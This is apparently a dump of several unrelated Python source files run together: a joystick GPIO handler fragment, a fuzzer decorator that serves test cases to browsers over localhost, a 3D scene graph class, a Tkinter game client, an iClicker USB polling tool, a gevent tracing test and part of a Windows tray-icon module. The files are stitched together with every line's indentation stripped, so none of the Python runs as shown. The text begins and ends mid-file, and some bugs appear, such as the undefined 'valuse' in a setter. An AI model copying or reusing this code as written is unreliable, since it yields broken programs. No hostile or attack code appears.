return False
mylogger.logger.info("CTRL-C exit")
if edge == "up":
try:
state = self.simple_input_read(channel)
while not state:
state = self.simple_input_read(channel)
time.sleep(0.1)
if state:
is_pressed = True
mylogger.logger.info("Button was pressed")
if state is None:
break
return is_pressed
except KeyboardInterrupt:
return False
mylogger.logger.info("CTRL-C exit")
def joystick_wait_for_event(self, in_loop=True):
return self.get_button_evenet(in_loop=True)
def __del__(self):
try:
print('kill object: cleanup')
for key in self.channels_dict:
GPIO.cleanup(self.channels_dict[key])
hei.hapt.set_channel_clean(True) # set channel clean to True after button finished to use it
except Exception as e:
print(e)
if "JoystickHandler" in __name__:
joystick = JoystickHandler(up_pin=22, down_pin=16, right_pin=27, left_pin=25, center_pin=24) # BCM mode
if __name__ == "__main__":
joystick = JoystickHandler(up_pin=22, down_pin=16, right_pin=27, left_pin=25, center_pin=24) # BCM mode
while True:
try:
joystick.joystick_wait_for_event()
except KeyboardInterrupt:
break
|
tornado_decorator.py | # Copyright (c) 2016-2018 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import logging
import threading
from inspect import isclass, isroutine
from tornado.ioloop import IOLoop
from tornado.template import Template
from tornado.web import Application, RequestHandler
logger = logging.getLogger(__name__)
class TornadoDecorator(object):
"""
Decorator for fuzzers to transport generated content through http. The
decorator starts a Tornado server at the start of the fuzz job and returns
a http url as test input. The SUT is expected to access the returned url and
the decorated fuzzer is invoked on every GET access to that url. The
response to the GET contains the generated test input prepended by a html
meta tag to force continuous reloads in the SUT (or a ``window.close()``
javascript content to force stopping the SUT if the decorated fuzzer cannot
generate more tests). Useful for transporting fuzz tests to browser SUTs.
**Mandatory parameter of the fuzzer decorator:**
- ``port``: first port to start binding the started http server to (keeps
incrementing until a free port is found).
**Example configuration snippet:**
.. code-block:: ini
[sut.foo]
# assuming that foo expects a http url as input, which it tries to access
# afterwards
[fuzz.foo-with-bar-over-http]
sut=foo
#fuzzer=...
fuzzer.decorate(0)=fuzzinator.fuzzer.TornadoDecorator
batch=5
[fuzz.foo-with-bar-over-http.fuzzer.decorate(0)]
port=8000
"""
def __init__(self, port, **kwargs):
self.port = int(port)
# Disable all the output of the tornado server to avoid messing up with Fuzzinator's messages.
hn = logging.NullHandler()
hn.setLevel(logging.DEBUG)
logging.getLogger('tornado.access').addHandler(hn)
logging.getLogger('tornado.access').propagate = False
def __call__(self, callable):
ancestor = object if isroutine(callable) else callable
class Inherited(ancestor):
decorator = self
def __init__(self, *args, **kwargs):
if hasattr(ancestor, '__init__'):
super().__init__(*args, **kwargs)
self.index = 0
self.test = None
self.fuzzer_kwargs = dict()
self.ioloop = None
def __call__(self, **kwargs):
# Saving fuzzer args to make them available from the RequestHandlers
# after passing a reference of ourselves.
if kwargs['index'] != 0 and self.test is None:
return None
self.fuzzer_kwargs = kwargs
return 'http://localhost:{port}?index={index}'.format(port=self.decorator.port, index=self.index)
def __enter__(self, *args, **kwargs):
if hasattr(ancestor, '__enter__'):
super().__enter__(*args, **kwargs)
app = Application([
(r'/', self.MainHandler, dict(wrapper=self,
fuzzer=super().__call__ if isclass(callable) else callable))
])
while True:
try:
server = app.listen(self.decorator.port)
break
except OSError:
self.decorator.port += 1
def ioloop_thread():
self.ioloop = IOLoop.current()
self.ioloop.start()
server.stop()
logger.debug('Tornado server started.')
threading.Thread(target=ioloop_thread).start()
return self
def __exit__(self, *exc):
suppress = False
if hasattr(ancestor, '__exit__'):
suppress = super().__exit__(*exc)
self.ioloop.add_callback(self.ioloop.stop)
logger.debug('Shut down tornado server.')
return suppress
class MainHandler(RequestHandler):
def __init__(self, application, request, wrapper, fuzzer):
super().__init__(application, request)
self.wrapper = wrapper
self.fuzzer = fuzzer
def data_received(self, chunk):
pass
def get(self):
content = '<script>window.close();</script>'
try:
self.wrapper.fuzzer_kwargs['index'] = self.wrapper.index
self.wrapper.test = self.fuzzer(**self.wrapper.fuzzer_kwargs)
if self.wrapper.test is not None:
self.wrapper.index += 1
content = Template('<meta http-equiv="refresh" content="1;url=?&{% raw request %}">{% raw test %}'). \
generate(request='index={index}'.format(index=self.wrapper.index), test=self.wrapper.test)
except Exception as e:
logger.warning('Unhandled exception in TornadoDecorator.', exc_info=e)
self.write(content)
return Inherited
|
scene.py | import numpy as np
from ..points import transform_points
from ..grouping import group_rows
from ..util import is_sequence, is_instance_named
from ..transformations import rotation_matrix
from .transforms import TransformForest
from collections import deque
class Scene:
'''
A simple scene graph which can be rendered directly via pyglet/openGL,
or through other endpoints such as a raytracer.
Meshes and lights are added by name, which can then be moved by updating
transform in the transform tree.
'''
def __init__(self,
node = None,
base_frame ='world'):
# instance name : mesh name
self.nodes = {}
# mesh name : Trimesh object
self.meshes = {}
self.flags = {}
self.transforms = TransformForest(base_frame = base_frame)
self.add_mesh(node)
self.set_camera()
def add_mesh(self, mesh):
'''
Add a mesh to the scene.
If the mesh has multiple transforms defined in its metadata,
a new instance of the mesh will be created at each transform.
'''
if is_sequence(mesh):
for i in mesh:
self.add_mesh(i)
return
if 'name' in mesh.metadata:
name_mesh = mesh.metadata['name']
else:
name_mesh = 'mesh_' + str(len(self.meshes))
self.meshes[name_mesh] = mesh
if 'transforms' in mesh.metadata:
transforms = np.array(mesh.metadata['transforms'])
else:
transforms = np.eye(4).reshape((-1,4,4))
for i, transform in enumerate(transforms):
name_node = name_mesh + '_' + str(i)
self.nodes[name_node] = name_mesh
self.flags[name_node] = {'visible':True}
self.transforms.update(frame_to = name_node,
matrix = transform)
@property
def bounds(self):
'''
Return the overall bounding box of the scene.
Returns
--------
bounds: (2,3) float points for min, max corner
'''
corners = deque()
for instance, mesh_name in self.nodes.items():
transform = self.transforms.get(instance)
corners.append(transform_points(self.meshes[mesh_name].bounds,
transform))
corners = np.vstack(corners)
bounds = np.array([corners.min(axis=0),
corners.max(axis=0)])
return bounds
@property
def extents(self):
return np.diff(self.bounds, axis=0).reshape(-1)
@property
def scale(self):
return self.extents.max()
@property
def centroid(self):
'''
Return the center of the bounding box for the scene.
Returns
--------
centroid: (3) float point for center of bounding box
'''
centroid = np.mean(self.bounds, axis=0)
return centroid
def duplicate_nodes(self):
'''
Return a sequence of node keys, where all keys in the group will
be of the same mesh
'''
mesh_ids = {k : m.identifier for k, m in self.meshes.items()}
node_keys = np.array(list(self.nodes.keys()))
node_ids = [mesh_ids[v] for v in self.nodes.values()]
node_groups = group_rows(node_ids, digits=1)
duplicates = np.array([node_keys[g] for g in node_groups])
return duplicates
def set_camera(self, angles=None, distance=None, center=None):
if center is None:
center = self.centroid
if distance is None:
distance = np.diff(self.bounds, axis=0).max()
if angles is None:
angles = np.zeros(3)
translation = np.eye(4)
translation[0:3,3] = center
translation[2][3] += distance*1.5
transform = np.dot(rotation_matrix(angles[0], [1,0,0], point=center),
rotation_matrix(angles[1], [0,1,0], point=center))
transform = np.dot(transform, translation)
self.transforms.update(frame_from = 'camera',
frame_to = self.transforms.base_frame,
matrix = transform)
def dump(self):
'''
Append all meshes in scene to a list of meshes.
'''
result = deque()
for node_id, mesh_id in self.nodes.items():
transform = self.transforms.get(node_id)
current = self.meshes[mesh_id].copy()
current.transform(transform)
result.append(current)
return np.array(result)
def export(self, file_type='dict64'):
'''
Export a snapshot of the current scene.
Arguments
----------
file_type: what encoding to use for meshes
ie: dict, dict64, stl
Returns
----------
export: dict with keys:
meshes: list of meshes, encoded as per file_type
transforms: edge list of transforms, eg:
((u, v, {'matrix' : np.eye(4)}))
'''
export = {}
export['transforms'] = self.transforms.export()
export['nodes'] = self.nodes
export['meshes'] = {name:mesh.export(file_type) for name, mesh in self.meshes.items()}
return export
def save_image(self, file_obj, resolution=(1024,768), **kwargs):
from .viewer import SceneViewer
SceneViewer(self,
save_image = file_obj,
resolution = resolution,
**kwargs)
def explode(self, vector=[0.0,0.0,1.0], origin=None):
'''
Explode a scene around a point and vector.
'''
if origin is None:
origin = self.centroid
centroids = np.array([self.meshes[i].centroid for i in self.nodes.values()])
if np.shape(vector) == (3,):
vectors = np.tile(vector, (len(centroids), 1))
projected = np.dot(vector, (centroids-origin).T)
offsets = vectors * projected.reshape((-1,1))
elif isinstance(vector, float):
offsets = (centroids-origin) * vector
else:
raise ValueError('Explode vector must by (3,) or float')
for offset, node_key in zip(offsets, self.nodes.keys()):
current = self.transforms[node_key]
current[0:3,3] += offset
self.transforms[node_key] = current
def show(self, block=True, **kwargs):
# this imports pyglet, and will raise an ImportError
# if pyglet is not available
from .viewer import SceneViewer
def viewer():
SceneViewer(self, **kwargs)
if block:
viewer()
else:
from threading import Thread
Thread(target = viewer, kwargs=kwargs).start()
|
PlayerGUI.py | from tkinter import *
from tkinter import ttk
import random
###############NETWORK################
import socket
import threading
def SendMessage(data):
#data = input('Send: ')
server_ip = '192.168.1.150'
port = 8000
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
server.connect((server_ip,port))
server.send(data.encode('utf-8'))
data_server = server.recv(1024).decode('utf-8')
print('Data from Server: ',data_server)
server.close()
def RunSendMessage(data):
task = threading.Thread(target=SendMessage,args=(data,))
task.start()
######################################
def PopupName():
GUI2 = Toplevel()
GUI2.attributes('-topmost',True)
GUI2.geometry('300x250')
GUI2.title('Name')
### ช่องกรอก 1 ช่อง
L = ttk.Label(GUI2,text='Name').pack()
v_name = StringVar()
EName = ttk.Entry(GUI2,textvariable=v_name,font=('Angsana New',20))
EName.pack(pady=10)
L = ttk.Label(GUI2,text='Room Code').pack()
v_code = StringVar()
ECode = ttk.Entry(GUI2,textvariable=v_code,font=('Angsana New',20))
ECode.pack(pady=10)
def EnterGame():
name = v_name.get()
code = v_code.get()
v_username.set(name)
v_codenumber.set(code)
RunSendMessage('START|{}|{}'.format(code,name))
GUI2.withdraw()
B1 = ttk.Button(GUI2,text='Enter Game',command=EnterGame)
B1.pack(ipadx=20,ipady=10)
GUI2.mainloop()
GUI = Tk()
GUI.geometry('700x800')
GUI.title('PlayerGUI')
FONT = ('Angsana New',25)
buttonStyle = ttk.Style()
buttonStyle.configure('my.TButton',font=FONT)
######NAME#######
v_username = StringVar()
LName = ttk.Label(GUI,textvariable=v_username,font=FONT)
LName.place(x=30,y=30)
v_codenumber = StringVar()
LCode = ttk.Label(GUI,textvariable=v_codenumber,font=FONT)
LCode.place(x=30,y=70)
######SCORE#######
L1 = ttk.Label(GUI,text='Current Score',font=FONT)
L1.pack(pady=30)
point = StringVar()
point.set('Point')
L11 = ttk.Label(GUI,textvariable=point,font=FONT)
L11.pack()
######BUTTON FIGHT#######
B1 = ttk.Button(GUI,text='Fight',style='my.TButton')
B1.pack(pady=50)
L2 = ttk.Label(GUI,text='Total Score',font=FONT)
L2.pack(pady=30)
sumpoint = StringVar()
sumpoint.set('Sumpoint')
L21 = ttk.Label(GUI,textvariable=sumpoint,font=FONT)
L21.pack()
scoreboard = ttk.Treeview(GUI)
scoreboard.pack(pady=50)
scoreboard['columns'] = ('no','total')
scoreboard['show'] = 'headings'
scoreboard.column('no',width=100,anchor='c')
scoreboard.column('total',width=100,anchor='c')
scoreboard.heading('no',text='No.')
scoreboard.heading('total',text='Total')
scoreboard.insert('','end',values=('1',100))
scoreboard.insert('','end',values=('2',100))
scoreboard.insert('','end',values=('3',100))
PopupName()
GUI.mainloop() |
iclickerpoll.py | #!/usr/bin/env python
from __future__ import print_function
import logging
import sys
import threading
import time
from array import array
from collections import Counter, defaultdict
import usb.core
import usb.util
from usb import USBError
log = logging.getLogger(__name__)
class Command(object):
def __init__(self, byte_array=None):
if byte_array is None:
byte_array = []
if type(byte_array) is str:
# If we passed in a string, assume it is a string of hex characters and turn it into bytes
byte_array = byte_array.replace(' ', '')
byte_array = array('B', (int(byte_array[i:i+2], 16) for i in range(0, len(byte_array), 2)))
elif type(byte_array) is bytes:
pass
# Make sure we have a 64 byte packet by padding with zeros
self.bytes = array('B', byte_array[:64])
self.bytes.extend([0]*(64-len(self.bytes)))
def __getitem__(self, key):
return self.bytes[key]
def __setitem__(self, key, value):
self.bytes[key] = valuse
def __repr__(self):
""" return the command as a hex string """
SPLIT_BY_N_CHARS = 16
hex_string = ''.join("%02X" % x for x in self.bytes)
return ' '.join(hex_string[i:i+SPLIT_BY_N_CHARS] for i in range(0, len(hex_string), SPLIT_BY_N_CHARS)).lower()
def __eq__(self, other):
return self.bytes == other.bytes
def __ne__(self, other):
return self.bytes != other.bytes
def as_bytes(self):
return self.bytes.tostring()
@staticmethod
def clicker_id_from_bytes(byte_seq):
""" Given a sequence of three bytes, computes the last byte
in the clicker id and returns it as hex """
# Make a copy since we'll be appending to it
byte_seq = byte_seq[:]
byte_seq.append(byte_seq[0] ^ byte_seq[1] ^ byte_seq[2])
return ''.join("%02X" % b for b in byte_seq)
def _process_alpha_clicker_response(self):
""" This method will return information about an alpha clicker response """
ret = {'type': 'ClickerResponse', 'poll_type': 'Alpha'}
ret['clicker_id'] = self.clicker_id_from_bytes(self.bytes[3:6])
# Responses start with 0x81 for A and work their way up, so ascii-recode them
ret['response'] = chr(self.bytes[2] - 0x81 + 65)
ret['seq_num'] = self.bytes[6]
return ret
def info(self):
""" return all the information we know about the command """
byte0 = self.bytes[0]
byte1 = self.bytes[1]
ret = { 'type': 'unknown', 'raw_command': self.__repr__() }
if byte0 == 0x01:
if byte1 == 0x10:
ret['type'] = 'SetFrequency'
ret['freq1'] = self.bytes[2] - 0x21
ret['freq2'] = self.bytes[3] - 0x41
if byte1 == 0x11:
ret['type'] = 'StartPolling'
if byte1 == 0x12:
ret['type'] = 'StopPolling'
if byte1 == 0x18:
if self.bytes[2] == 0x01 and self.bytes[3] == 0x00:
ret['type'] = 'ResetBase'
if byte1 == 0x19:
ret['type'] = 'SetPollType'
ret['quiz_type'] = self.bytes[2] - 0x67
if byte1 == 0x2d:
ret['type'] = 'SetIClicker2Protocol'
elif byte0 == 0x02:
if byte1 == 0x13:
ret.update(self._process_alpha_clicker_response())
if byte1 == 0x1a:
pass
return ret
def response_info(self):
""" Returns a list containing every response in this command.
Since a 64 byte command can contain two 32 byte clicker responses,
this separates them and returns a list with both their infos """
info1 = Command(self.bytes[:32]).info()
info2 = Command(self.bytes[32:]).info()
ret = []
if info1['type'] == 'ClickerResponse':
ret.append(info1)
if info2['type'] == 'ClickerResponse':
ret.append(info2)
return ret
class IClickerBase(object):
""" This class handles all the hardware-related aspects of talking
with the iClicker base unit. """
VENDOR_ID = 0x1881
PRODUCT_ID = 0x0150
def __init__(self):
self.device = None
self.last_set_screen_time = 0
self.has_initialized = False
# pyusb is not threadsafe, so we need to aquire a lock for all usb operations
self.usb_lock = threading.RLock()
self.screen_buffer = [' '*16, ' '*16]
self.screen_queue = [False, False] # A list of which line of the screen needs to be updated
def _write(self, data):
""" raw-write of data to self.device"""
with self.usb_lock:
self.device.ctrl_transfer(0x21, 0x09, 0x0200, 0x0000, data.as_bytes())
def _read(self, timeout=100):
""" read a packet of data from self.device"""
with self.usb_lock:
ret = Command(self.device.read(0x83, 64, timeout=timeout))
return ret
def _syncronous_write(self, data, timeout=100):
""" writes data to self.device expecting a reponse of "?? ?? aa"
where "?? ??" are the first two bytes of data """
expected_response = Command([data[0], data[1], 0xaa])
self._write(data)
response = self._read(timeout=timeout)
if response != expected_response:
raise IOError("Attempted syncronuous write of {0} and got {1} (expecting {2})".format(data.__repr__(), response.__repr__(), expected_response.__repr__()))
def _write_command_sequence(self, seq):
""" Write a sequence of commands to the usb device and read all the responses """
for cmd in seq:
self._write(cmd)
try:
while True:
response = self._read()
except USBError:
pass
def read(self, timeout=100):
try:
return Command(self._read(timeout))
except:
return None
def get_base(self):
""" Looks on the USB bus for an iClicker device """
with self.usb_lock:
self.device = usb.core.find(idVendor=self.VENDOR_ID, idProduct=self.PRODUCT_ID)
if self.device is None:
raise ValueError('Error: no iclicker device found')
if self.device.is_kernel_driver_active(0):
log.warning("The iClicker seems to be in use by another device--Forcing reattach.")
self.device.detach_kernel_driver(0)
self.device.set_configuration()
def set_base_frequency(self, code1='a', code2='a'):
""" Sets the operating frequency """
def code_to_number(code):
if type(code) is str:
# 'a' == 1, 'b' == 2, etc.
return ord(code.lower()) - 97
return code
time.sleep(0.2)
cmd = Command([0x01, 0x10, 0x21 + code_to_number(code1), 0x41 + code_to_number(code2)])
self._syncronous_write(cmd)
time.sleep(0.2)
cmd = Command([0x01, 0x16])
self._syncronous_write(cmd)
time.sleep(0.2)
def set_version_two_protocol(self):
""" Sets the base unit to use the iClicker version 2 protocol """
cmd = Command([0x01, 0x2d])
self._write(cmd)
time.sleep(0.2)
def set_poll_type(self, poll_type='alpha'):
""" Sets the poll type to 'alpha', 'numeric', or 'alphanumeric' """
log.debug('Setting poll type to {0}'.format(poll_type))
poll_type = {'alpha': 0, 'numeric': 1, 'alphanumeric': 2}[poll_type]
cmd = Command([0x01, 0x19, 0x66+poll_type, 0x0a, 0x01])
self._write(cmd)
time.sleep(0.2)
#TODO: There are still a lot of unknowns here...right now
# it just repeates what was snooped from USB on Windows
def initialize(self, freq1='a', freq2='a'):
COMMAND_SEQUENCE_A = [
Command("01 2a 21 41 05"),
Command("01 12"),
Command("01 15"),
Command("01 16"),
]
COMMAND_SEQUENCE_B = [
Command("01 29 a1 8f 96 8d 99 97 8f"),
Command("01 17 04"),
Command("01 17 03"),
Command("01 16"),
]
if self.device is None:
self.get_base()
self.set_base_frequency(freq1, freq2)
self._write_command_sequence(COMMAND_SEQUENCE_A)
self.set_version_two_protocol()
self._write_command_sequence(COMMAND_SEQUENCE_B)
self.has_initialized = True
def start_poll(self, poll_type='alpha'):
COMMAND_SEQUENCE_A = [
Command("01 17 03"),
Command("01 17 05"),
]
command_START_POLL = Command("01 11")
self._write_command_sequence(COMMAND_SEQUENCE_A)
self.set_poll_type(poll_type)
self._write(command_START_POLL)
def stop_poll(self):
COMMAND_SEQUENCE_A = [
Command("01 12"),
Command("01 16"),
Command("01 17 01"),
Command("01 17 03"),
Command("01 17 04"),
]
self._write_command_sequence(COMMAND_SEQUENCE_A)
def _set_screen(self, line=0):
""" Sets the line @line to the characters specified by self.screen_buffer[line].
This command messes up the screen if it is sent too frequently. """
if line == 0:
cmd = [0x01, 0x13]
else:
cmd = [0x01, 0x14]
# Make sure we are writing only 16 characters to the screen
string = self.screen_buffer[line]
string = string[:16]
string = string + ' '*(16-len(string))
cmd.extend(ord(c) for c in string)
cmd = Command(cmd)
self.last_set_screen_time = time.time()
self._write(cmd)
def set_screen(self, string, line=0, force_update=False):
""" Sets the line @line to the characters specified by @string.
This command messes up the screen if it is sent too frequently,
so an automatic delay is added between issuances of set_screen """
MIN_SCREEN_UPDATE_TIME = 0.1
# Set our buffer to the appropriate string, and if our buffer hasn't
# changed, just exit--we don't even need to update the screen
if string == self.screen_buffer[line] and force_update is False:
return
self.screen_buffer[line] = string
self.screen_queue[line] = True
def process_screen_queue(line):
# if the screenqueue is false, it means another thread already handled updating
# the screen for us
if self.screen_queue[line] is False:
return
# Make sure we don't send two write commands too frequently.
# If we have tried to send a command too recently, start a
curr_time = time.time()
if curr_time - self.last_set_screen_time < MIN_SCREEN_UPDATE_TIME:
delay_duration = (MIN_SCREEN_UPDATE_TIME - (curr_time - self.last_set_screen_time))
timer = threading.Timer(delay_duration, process_screen_queue, [line])
timer.start()
return
# If the last write wasn't too recent, let's do it!
self.screen_queue[line] = False
self._set_screen(line)
process_screen_queue(line)
class Response(object):
""" Keeps track of all relavent information about a clicker response """
def __init__(self, clicker_id=None, response=None, click_time=None, seq_num=None, command=None):
if click_time is None:
self.click_time = time.time()
else:
self.click_time = click_time
if command is not None:
pass
self.clicker_id = clicker_id
self.response = response
self.seq_num = seq_num
def __eq__(self, other):
if type(other) is Response:
return self.clicker_id == other.clicker_id and self.response == other.response and self.seq_num == other.seq_num
else:
return False
def __ne__(self, other):
if type(other) is Response:
return self.clicker_id != other.clicker_id or self.response != other.response or self.seq_num != other.seq_num
else:
return True
def __repr__(self):
return "{0}: {1} ({2} at {3})".format(self.clicker_id, self.response, self.seq_num, self.click_time)
class IClickerPoll(object):
def __init__(self, iclicker_base):
self.base = iclicker_base
self.STOP_POLL = False
self.should_print = True
self.poll_start_time = 0
self.responses = defaultdict(list)
def update_display(self):
""" updates the base display according to the poll results """
# Write the distribution of votes to the second line of the display
out_string = " 0 0 0 0 0 "
recent_responses = self.get_most_recent_responses()
tally = Counter(r.response for r in recent_responses if r.response != 'F') #'F' means retract answer
if len(tally) > 0:
total = sum(tally.values())
out_string = "{0} {1} {2} {3} {4}".format(int(100*tally['A']/total),
int(100*tally['B']/total),
int(100*tally['C']/total),
int(100*tally['D']/total),
int(100*tally['E']/total))
self.base.set_screen(out_string, line=1)
# Write the time and number of total votes to the first line of the display
secs = int(time.time() - self.poll_start_time)
mins = secs // 60
secs = secs % 60
out_string_time = "{0}:{1:02}".format(mins, secs)
out_string = "{0}{1:>{padding}}".format(out_string_time, sum(tally.values()), padding=(16-len(out_string_time)))
self.base.set_screen(out_string, line=0)
def start_poll(self, poll_type='alpha'):
""" Starts a poll and then starts watching input """
if not self.base.has_initialized:
self.base.initialize()
self.STOP_POLL = False
self.poll_start_time = time.time()
self.poll_type = poll_type
self.base.start_poll(poll_type)
# This blocks until self.STOP_POLL is set to true
self.watch_input()
# After watch input exits, we want to stop the poll
self.stop_poll()
def stop_poll(self):
self.STOP_POLL = True
self.base.stop_poll()
def watch_input(self):
""" Constantly polls the usb device for clicker responses """
self.display_update_loop()
while self.STOP_POLL is False:
response = self.base.read(50)
# if there is no response, do nothing but update the display
if response is None:
continue
for info in response.response_info():
self.add_response(Response(info['clicker_id'], info['response'],
time.time(), info['seq_num']))
self.update_display()
def display_update_loop(self, interval=1):
""" Spawns a new thread and updates the display every @interval
number of seconds """
def update():
while self.STOP_POLL is False:
self.update_display()
time.sleep(interval)
display_thread = threading.Thread(target=update)
display_thread.start()
def add_response(self, response):
""" Adds a response to the response list """
if response not in self.responses[response.clicker_id]:
self.responses[response.clicker_id].append(response)
self.print_response(response)
def get_most_recent_responses(self):
""" returns a list of the most recent responses """
return [self.responses[key][-1] for key in self.responses.keys()]
def get_most_recent_responses_formatted(self):
""" returns a csv formatted string containing all the responses for
each clicker ID """
recent_responses = self.get_most_recent_responses()
out = ['{0},{1}'.format(r.clicker_id, r.response) for r in recent_responses]
return '\n'.join(out)
def print_response(self, response):
if self.should_print:
print(response)
# This is a callback that stops the poll, since start a poll is a blocking operation
def close_pole(poll):
print("Stopping Poll")
poll.stop_poll()
if __name__ == '__main__':
import argparse
import signal
parser = argparse.ArgumentParser(description='Start an iClicker poll')
parser.add_argument('--debug', action='store_true', default=False,
help='Display debug information about the USB transactions')
parser.add_argument('--type', type=str, default='alpha',
help='Sets the poll type to alpha, numeric, or alphanumeric')
parser.add_argument('--duration', type=str, default='100m0s',
help='Sets the duration of the poll in minutes and seconds. 0m0s is unlimited.')
parser.add_argument('--dest', type=str, default='',
help='Sets the file to save polling data to.')
parser.add_argument('--frequency', type=str, default='aa',
help='Sets the two base-station frequency codes. Should be formatted as two letters (e.g., \'aa\' or \'ab\')')
args = parser.parse_args()
#
# Process all the arguments
#
if args.debug:
log.setLevel(0)
if args.type in ['alpha', 'numeric', 'alphanumeric']:
poll_type = args.type
else:
raise ValueError("Poll type must be 'alpha', 'numeric', or 'alphanumeric', not '{0}'".format(args.type))
if args.duration:
poll_duration = 1000
if args.frequency:
freq1 = args.frequency[0].lower()
freq2 = args.frequency[1].lower()
if freq1 not in ('a', 'b', 'c', 'd') or freq2 not in ('a', 'b', 'c', 'd'):
raise ValueError("Frequency combintation '{0}{1}' is not valid".format(freq1, freq2))
#
# Initiate the polling
#
print('Finding iClicker Base')
base = IClickerBase()
base.get_base()
print('Initializing iClicker Base')
base.initialize(freq1, freq2)
# If we have successfully started a poll, set up a signal handler
# to clean up when we get a SIGINT (ctrl+c or kill) command
poll = IClickerPoll(base)
signal.signal(signal.SIGINT, lambda *x: close_pole(poll))
# Set a callback to stop the poll after the desired amount of time
if poll_duration:
stop_timer = threading.Timer(poll_duration, lambda *x: close_pole(poll))
stop_timer.start()
print('Poll Started')
poll.start_poll(poll_type)
# If we made it this far and stop_timer wasn't triggered, we were asked to stop another
# way, so we should stop the stop_timer
stop_timer.cancel()
if args.dest:
file_name = args.dest
print('Writing results to {0}'.format(file_name))
with open(file_name, 'w') as out_file:
out_file.write(poll.get_most_recent_responses_formatted())
|
test__threading_vs_settrace.py | from __future__ import print_function
import sys
import subprocess
import unittest
from gevent.thread import allocate_lock
import gevent.testing as greentest
script = """
from gevent import monkey
monkey.patch_all()
import sys, os, threading, time
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
time.sleep(0.1)
sys.stdout.write('..program blocked; aborting!')
sys.stdout.flush()
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
def trace(frame, event, arg):
if threading is not None:
threading.currentThread()
return trace
def doit():
sys.stdout.write("..thread started..")
def test1():
t = threading.Thread(target=doit)
t.start()
t.join()
sys.settrace(None)
sys.settrace(trace)
if len(sys.argv) > 1:
test1()
sys.stdout.write("..finishing..")
"""
class TestTrace(unittest.TestCase):
@greentest.skipOnPurePython("Locks can be traced in Pure Python")
def test_untraceable_lock(self):
# Untraceable locks were part of the solution to https://bugs.python.org/issue1733757
# which details a deadlock that could happen if a trace function invoked
# threading.currentThread at shutdown time---the cleanup lock would be held
# by the VM, and calling currentThread would try to acquire it again. The interpreter
# changed in 2.6 to use the `with` statement (https://hg.python.org/cpython/rev/76f577a9ec03/),
# which apparently doesn't trace in quite the same way.
if hasattr(sys, 'gettrace'):
old = sys.gettrace()
else:
old = None
lst = []
try:
def trace(frame, ev, _arg):
lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
print("TRACE: %s:%s %s" % lst[-1])
return trace
with allocate_lock():
sys.settrace(trace)
finally:
sys.settrace(old)
self.assertEqual(lst, [], "trace not empty")
@greentest.skipOnPurePython("Locks can be traced in Pure Python")
def test_untraceable_lock_uses_different_lock(self):
if hasattr(sys, 'gettrace'):
old = sys.gettrace()
else:
old = None
lst = []
# we should be able to use unrelated locks from within the trace function
l = allocate_lock()
try:
def trace(frame, ev, _arg):
with l:
lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
# print("TRACE: %s:%s %s" % lst[-1])
return trace
l2 = allocate_lock()
sys.settrace(trace)
# Separate functions, not the C-implemented `with` so the trace
# function gets a crack at them
l2.acquire()
l2.release()
finally:
sys.settrace(old)
# Have an assert so that we know if we miscompile
self.assertTrue(lst, "should not compile on pypy")
@greentest.skipOnPurePython("Locks can be traced in Pure Python")
def test_untraceable_lock_uses_same_lock(self):
from gevent.hub import LoopExit
if hasattr(sys, 'gettrace'):
old = sys.gettrace()
else:
old = None
lst = []
e = None
# we should not be able to use the same lock from within the trace function
# because it's over acquired but instead of deadlocking it raises an exception
l = allocate_lock()
try:
def trace(frame, ev, _arg):
with l:
lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
return trace
sys.settrace(trace)
# Separate functions, not the C-implemented `with` so the trace
# function gets a crack at them
l.acquire()
except LoopExit as ex:
e = ex
finally:
sys.settrace(old)
# Have an assert so that we know if we miscompile
self.assertTrue(lst, "should not compile on pypy")
self.assertTrue(isinstance(e, LoopExit))
def run_script(self, more_args=()):
args = [sys.executable, "-c", script]
args.extend(more_args)
rc = subprocess.call(args)
self.assertNotEqual(rc, 2, "interpreter was blocked")
self.assertEqual(rc, 0, "Unexpected error")
def test_finalize_with_trace(self):
self.run_script()
def test_bootstrap_inner_with_trace(self):
self.run_script(["1"])
if __name__ == "__main__":
greentest.main()
|
test.py |
import threading
import sys
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
def isScalar(x):
return not isinstance(x, (list, tuple))
def isList(x):
return isinstance(x, (list))
def asString(x):
return str(x)
def makeDict():
return {'a': 1.0, 'c': 3.0, 'b': 2.0}
def makeTuple():
return (1.0, 2.0, 3.0)
def makeIterator(x):
return iter(x)
def makeGenerator(n):
i = 0
while i < n:
yield i
i += 1
def iterateOnThread(iter):
results = []
def iteration_worker():
for i in iter:
results.append(i)
thread = threading.Thread(target = iteration_worker)
thread.start()
while thread.isAlive():
thread.join(0.1)
return results
def reflect(x):
return x
def callFunc(f, *args, **kwargs):
return f(*args, **kwargs)
def testThrowError():
throwError()
def throwError():
raise ValueError('A very specific bad thing happened')
class PythonClass(object):
FOO = 1
BAR = 2
@classmethod
def class_method(cls):
return cls.FOO
class PythonCallable(object):
FOO = 1
BAR = 2
""" Call a callable
Args:
arg1: First argument.
"""
def __call__(self, arg1):
return arg1
def create_callable():
return PythonCallable()
dict_with_callable = dict(callable = create_callable())
|
notificationicon.py | # Pure ctypes windows taskbar notification icon
# via https://gist.github.com/jasonbot/5759510
# Modified for ZeroNet
import ctypes
import ctypes.wintypes
import os
import uuid
import time
import gevent
__all__ = ['NotificationIcon']
# Create popup menu
CreatePopupMenu = ctypes.windll.user32.CreatePopupMenu
CreatePopupMenu.restype = ctypes.wintypes.HMENU
CreatePopupMenu.argtypes = []
MF_BYCOMMAND = 0x0
MF_BYPOSITION = 0x400
MF_BITMAP = 0x4
MF_CHECKED = 0x8
MF_DISABLED = 0x2
MF_ENABLED = 0x0
MF_GRAYED = 0x1
MF_MENUBARBREAK = 0x20
MF_MENUBREAK = 0x40
MF_OWNERDRAW = 0x100
MF_POPUP = 0x10
MF_SEPARATOR = 0x800
MF_STRING = 0x0
MF_UNCHECKED = 0x0
InsertMenu = ctypes.windll.user32.InsertMenuW
InsertMenu.restype = ctypes.wintypes.BOOL
